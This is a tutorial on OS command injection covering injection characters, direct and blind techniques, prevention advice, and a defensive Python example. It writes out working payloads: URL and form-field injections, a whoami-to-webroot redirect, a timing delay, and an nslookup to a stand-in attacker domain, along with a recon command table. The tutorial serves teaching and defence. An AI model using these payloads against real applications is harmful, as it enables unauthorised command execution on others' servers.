OS Command Injection
What is OS Command Injection?
OS Command Injection allows attackers to execute arbitrary operating system commands on a server by injecting malicious input into a vulnerable application. This occurs when user input is passed to a shell command without sufficient sanitization.
How It Works
The attacker supplies input that the application embeds, unchanged, in a shell command. For example:
Input is included in a backend command such as:
stockreport.pl 432 32
A malicious product ID like
432 & echo hello &
modifies the command to:
stockreport.pl 432 & echo hello & 32
Because & separates commands, the shell executes
echo hello
alongside the intended command.
Types of OS Command Injection
1. Direct Injection
The output of the injected command is visible in the application response. Example:
https://insecure-website.com/stockStatus?productID=& echo hello &
If the response includes hello, the injection is successful.
2. Blind Injection
The output of the injected command is not visible in the response. Various techniques can be used to confirm execution:
Timing Attacks:
Inject a time delay to observe the response time.
https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &
File Writing:
Write command output to a file accessible via the web.
https://vulnerable-website.com/stockStatus?productID=& whoami > /var/www/static/whoami.txt &
Out-of-Band Interaction:
Trigger DNS lookups or HTTP requests to an attacker-controlled server.
https://vulnerable-website.com/stockStatus?productID=& nslookup attacker-domain.com &
Injection Characters
The following characters can be used to inject commands:

Character          | Usage
&                  | Execute multiple commands sequentially.
&&                 | Execute the next command only if the previous one succeeds.
;                  | Separate multiple commands.
Newline (\n, 0x0a) | Separate commands (Unix-specific).

Bash-Specific Characters:
` (Backticks): Execute commands within the backticks.
$() (Subshell): Execute commands within the parentheses.
Examples of OS Command Injection
Exploiting GET Parameters
Echo Command Injection:
https://insecure-website.com/stockStatus?productID=& echo hello &
Timing-Based Blind Injection:
https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &
Exploiting POST Parameters
Inject Commands into Form Fields:
POST /submit-form HTTP/1.1

csrf=token&name=test&email=test@example.com & sleep 10 #&subject=Testing
Redirect Output:
& whoami > /var/www/static/whoami.txt &
Useful Commands for Testing
Purpose                  | Linux Command | Windows Command
Current user             | whoami        | whoami
Operating system         | uname -a      | ver
Network configuration    | ifconfig      | ipconfig /all
Open network connections | netstat -an   | netstat -an
Running processes        | ps -ef        | tasklist
Advanced Techniques
Using Time Delays
Inject a delay to observe execution:
& sleep 10 &
Redirecting Output
Write command output to a file accessible via the web:
& whoami > /var/www/static/whoami.txt &
Out-of-Band Interaction
Trigger DNS or HTTP requests to an attacker-controlled server:
& nslookup attacker-domain.com &
How to Prevent OS Command Injection
Avoid Shell Commands:
Avoid passing user input to shell commands.
Use high-level APIs or libraries to handle tasks like file operations or process management.
Validate User Input:
Use a safelist to restrict allowed characters and commands.
Block special characters like &, |, ;, and `.
Sanitize Input:
Use escaping techniques appropriate to the shell environment.
Use Strong Permissions:
Limit the application's ability to execute shell commands or access sensitive files.
Employ Security Measures:
Use Web Application Firewalls (WAFs) to block malicious requests.
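As an added example (not code from the original page), here is a Python version of the stock-status lookup built the way the prevention points above recommend: a digits-only safelist for the IDs, and an argument-list process call with no shell, so & and the other characters in the table are never parsed as command separators. stockreport.pl is the page's hypothetical backend; echo stands in for it so the block runs anywhere, and the payload 432 & echo hello & is the page's own.

```python
import re
import subprocess

# Hypothetical backend script named on the page; `echo` stands in for it below
# so the example runs anywhere.
STOCK_REPORT = "stockreport.pl"
# Safelist: an ID is one to ten ASCII digits and nothing else.
ID_PATTERN = re.compile(r"[0-9]{1,10}")


def is_safe_id(value: str) -> bool:
    """True only for safelisted input; the page's payload '432 & echo hello &' fails."""
    return ID_PATTERN.fullmatch(value) is not None


def build_vulnerable_command(product_id: str, store_id: str) -> str:
    """The vulnerable pattern from the page: raw concatenation into one shell
    line. Kept only for contrast; it is never executed in this example."""
    return f"{STOCK_REPORT} {product_id} {store_id}"


def build_safe_argv(product_id: str, store_id: str) -> list:
    """First defence: validated IDs as separate argv elements. Anything outside
    the safelist is rejected before a process is ever started."""
    for value in (product_id, store_id):
        if not is_safe_id(value):
            raise ValueError(f"rejected input: {value!r}")
    return [STOCK_REPORT, product_id, store_id]


def run_stock_report(product_id: str, store_id: str) -> str:
    """Second defence: shell=False, so no /bin/sh parses the arguments."""
    argv = build_safe_argv(product_id, store_id)
    argv[0] = "echo"  # stand-in for stockreport.pl (assumption, see lead-in)
    done = subprocess.run(argv, shell=False, capture_output=True, text=True, check=True)
    return done.stdout.strip()


def run_without_shell(arg: str) -> str:
    """The second defence on its own: even an unvalidated payload reaches the
    program as one literal argument. echo prints it back verbatim and no
    second command runs, unlike the shell line from build_vulnerable_command."""
    done = subprocess.run(["echo", arg], capture_output=True, text=True, check=True)
    return done.stdout.strip()
```

Escaping (the "Sanitize Input" point) is the weakest of these layers because it must match the exact shell in use; the safelist and the argv call do not depend on shell quoting rules at all.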